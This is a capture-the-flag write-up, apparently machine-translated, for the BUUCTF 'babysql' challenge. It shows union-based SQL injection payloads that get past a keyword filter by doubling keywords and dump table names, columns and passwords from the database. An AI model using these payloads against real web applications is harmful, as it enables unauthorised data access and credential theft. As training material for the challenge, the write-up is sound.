Buuctf's babysql[geek challenge 2019]

Catalog

Closed number test

Field number judgment

Keyword filtering determines

Explosion meter  

Closed number test

Try to login with universal password first

  An error is reported when logging in , According to the error reporting statement , Should be or Deleted by filtering , Try double writing to bypass

Login successfully , It is determined that the closure number is ', Later tests found that , Filtered keywords can be bypassed by double spelling

Field number judgment

use order by The number of fields tested is 3, Then inject... With joint injection , structure payload

1' uunionnion sselectelect 1,2,3#

Keyword filtering determines

Determine echo location , Before joint injection , You have to look at filtering out the main keywords of joint injection , structure payload,

1' uunionnion sselectelect 1,'from','group_concat()'#

from No response , It's filtered out , Then continue to construct payload

1' uunionnion sselectelect 1,'information_schema.tables','where'#

 emm, Here is or Filtered out and where,

Explosion meter  

structure payload

1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema = database()#

Then burst the field

1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema = database() aandnd table_name = 'b4bsql'#

Then check the value

1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom b4bsql#

Get flag